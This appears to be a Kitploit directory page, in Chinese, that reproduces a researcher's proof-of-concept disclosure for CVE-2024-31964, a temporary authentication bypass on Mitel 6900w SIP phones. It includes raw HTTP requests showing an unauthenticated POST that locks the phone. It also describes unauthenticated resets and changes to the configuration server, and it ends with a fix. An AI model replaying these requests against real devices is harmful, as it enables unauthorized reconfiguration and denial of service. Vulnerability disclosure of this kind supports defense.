Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/d-raco/cve-2024-31964
物联网安全漏洞分析漏洞利用Web应用程序漏洞利用渗透测试硬件安全身份验证
GitHubd-raco/cve-2024-31964

CVE-2024-31964

CVE-2024-31964的概念验证利用代码,针对Mitel 6900w系列SIP电话的临时认证绕过漏洞,允许未经身份验证的POST请求修改设备配置并执行拒绝服务攻击。

查看仓库
221年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-31964

CVE-2024-31964 概念验证: Mitel 6900w 系列 SIP 电话 - 临时身份认证绕过

漏洞详情

总结

该漏洞涉及多个 Mitel 产品 HTTP 管理网站面板中的临时身份认证绕过漏洞。

影响

允许攻击者修改设备配置,并对受影响设备执行拒绝服务攻击。

利用条件

攻击者需要与被利用用户来自同一源 IP,且该用户在几分钟前已成功登录。

建议的 CVSS

建议的 CVSS:

  • CVSS v4.0 评分: 7.2
  • CVSS v4.0 向量: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:H/SC:L/SI:L/SA:H

参考资料

公告: Mitel Product Security Advisory 24-0007

测试环境

本 CVE 在审计 3 台具有以下属性的 SIP 电话时发现(此 CVE 已成功针对这 3 种设备型号测试):

  • 设备制造商: Mitel
  • 设备型号:
    • 6920w
    • 6930w
    • 6940w
  • 固件版本: firmware 6.3.2.85
  • 系统语言: 西班牙语
  • 设备参考 URL:
    • https://www.mitel.com/document-center/devices-and-accessories/ip-phones/6900-series/6900-ip-phones/minet-22/en/mitel-6920-6920w-ip-phone-user-guide
    • https://www.mitel.com/document-center/devices-and-accessories/ip-phones/6900-series/6900-ip-phones/minet-22/en/mitel-6930-6930w-ip-phone-user-guide
    • https://www.mitel.com/document-center/devices-and-accessories/ip-phones/6900-series/6900-ip-phones/minet-22/en/mitel-6940-6940w-ip-phone-user-guide
  • 受影响组件: HTTP 管理网站面板

根据 Mitel 的公告,该漏洞影响更多产品,但我没有访问权限进行验证。

概念验证

通常,要访问任何 Mitel 控制/管理 Web 面板资源,必须在请求中包含 "Authorization" 头,该头设置了尝试访问用户的凭证。

认证请求示例:

0-authenticated_request

root@kitploit:~
GET /sysinfo.html HTTP/1.1
Host: 10.XX.XX.246
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Authorization: Basic XXXXXXXXXXXX
Referer: https://10.XX.XX.246/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

如果未设置此头,则会收到 "Unauthorized" 错误,并要求进行身份验证,需要提供凭证。

未认证的 GET 请求:

1-unauthenticated_request

root@kitploit:~
GET /sysinfo.html HTTP/1.1
Host: 10.XX.XX.246
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Referer: https://10.XX.XX.246/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

响应:

root@kitploit:~
HTTP/1.1 401 Unauthorized
Server: XXX
WWW-Authenticate: Basic realm="Mitel 6920w"
Connection: close
Content-Length: 745
Content-Type: text/html

<html>
<head>
<title>HTTP 401 Unauthorized</title>
</head>
<body bgcolor="white">
<table width="450" cellpadding="3" cellspacing="5">
<tr>
<td>
<h1 style="COLOR: black; FONT: 13pt/15pt verdana">
You are not authorized to view this page</h1>
</td>
...

然而,事实证明,所有来自应用程序的 POST 请求都可以在不设置 Authorization 头的情况下发起,即作为未认证用户,前提是合法用户在之前已从与攻击者相同的源 IP 登录,并且时间有限(经测量,时间窗口约为 8 分钟)。也就是说,如果合法用户登录到设备的管理网站,则存在大约 8 分钟的时间窗口,在此期间,具有相同 IP 的攻击者可以发起未认证的 POST 请求,而无需知道凭证。该漏洞由于要求与合法用户共享 IP 而具有很大的限制性,但在共享 PC 或通过同一代理服务器访问计算机的情况下,利用的可能性会更高。

通过 POST 请求,可以更改用户密码(需要事先知道密码)、锁定/解锁设备、重置设备、上传联系人 CSV 文件、配置配置服务器等。

例如,如果我们尝试在没有 Authorization 头的情况下锁定设备,可以看到设备被有效阻止,拒绝向用户提供服务,我们还可以重启电话,暂时完全拒绝服务。作为快速测试,我们还成功修改了快速拨号键和配置服务器。

未认证的锁定请求示例:

2-unauthenticated_lock

root@kitploit:~
POST /phonelock.html HTTP/1.1
Host: 10.XX.XX.246
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Origin: https://10.XX.XX.246
Dnt: 1
Referer: https://10.XX.XX.246/phonelock.html
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

EmergencydialPlan=112%7C999%7C911%7C110&autolockDelay=0&autounlockDelay=0&lock=Bloquear

成功未认证的响应:

root@kitploit:~
HTTP/1.1 200 OK
X-Frame-Options: DENY
Content-Length: 4160
Connection: close
Accept-Language: es
Content-Type: text/html
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Mitel 6920w</title>
<link rel='stylesheet' type='text/css' href='aastra.css' />
<link rel="shortcut icon" href="favicon.ico" type="image/x-icon" />
...
<div id='content'>
<p>Teléf. bloqueado</p>
</div></div><div id='footer'><span class='copyright'>Copyright &copy; 2023 Mitel Networks Corporation</span><span class='support'><a href='https://github.com/d-raco/cve-2024-31964/blob/main/support'>Servicio de soporte técnico</a></span></div></div></body></html>

此外,我们可以请求设备重置:

3-unauthenticated_reset

并使用 ping 验证暂时的连接丢失:

4-ping_unauthenticated_reset

我们可以更改大多数参数...例如,FTP 服务器:

5-unauthenticated_ftp_mod 6-unauthenticated_ftp_mod_changed

建议的解决方案

应始终要求并验证 Authorization 头,和/或使用 Cookie 管理会话,而非源 IP。

下载工具